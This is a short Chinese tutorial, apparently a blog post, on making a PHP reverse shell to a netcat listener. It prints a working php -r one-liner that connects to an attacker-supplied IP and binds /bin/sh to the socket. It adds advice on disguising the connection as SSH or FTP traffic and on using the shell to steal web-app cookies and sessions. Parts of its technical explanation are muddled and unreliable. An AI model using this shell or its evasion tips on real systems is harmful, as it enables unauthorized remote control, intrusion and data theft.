NC反彈PHP是指將PHP代碼通過反彈Shell的形式，傳送到遠程主機并執行的一種方式。它可以用于繞過防火墻、翻墻，或者用來進行遠程控制。

NC反彈PHP的優點在于，可以使用任何一臺可以連接到遠程主機的計算機來掌控主機，無需在遠程主機上安裝任何東西。下面就來介紹一下如何實現NC反彈PHP。

$ php -r '$sock=fsockopen("your ip",1234);exec("/bin/sh -i<&3 >&3 2>&3");'

上面這行代碼是NC反彈PHP的核心代碼，下面我們來逐一解釋一下它的含義。

php -r的意思是直接在當前終端中執行一行php代碼，后面跟的是NC反彈的核心代碼。這一行代碼將與名為“your ip”的主機建立一個tcp連接。

在這個連接中，我們使用exec函數在當前進程中打開一個新的shell，并將它綁定到一個名為3的文件描述符上。

同時，我們將執行shell的標準輸入、輸出和錯誤輸出，都重定向到描述符3。這樣，當我們輸入命令時，就可以直接在與目標主機建立的連接中執行它。

當輸入exit命令退出shell后，整個連接也將被關閉。

以上就是NC反彈PHP的核心代碼，不過在實際應用中，還需要進行比較多的修改才能實現特定的功能。

例如，我們可以將上面的1234端口號改為其他未被占用的端口號，來偽裝這個連接是由某個常見的服務程序打開的（例如SSH、FTP等）。

$ php -r '$sock=fsockopen("your ip",80);fwrite($sock,"GET / HTTP/1.1\r\nHost: your ip\r\n\r\n");fclose($sock);'

如果目標主機存在弱口令或存在Web漏洞，NC反彈PHP就可以被用來進行遠程滲透了。

例如在Web漏洞中，我們可以將上面代碼中的80端口改為目標Web應用監聽的端口，然后通過PHP獲得Web應用的cookie、session等敏感信息，進行后續攻擊。

綜上所述，NC反彈PHP是遠程滲透的一項重要技術，并被廣泛應用于黑客攻擊、安全測試等領域。但同時也需要注意，該技術也被廣泛用于網絡犯罪活動，因此應適度使用，并合法、合規地應用它。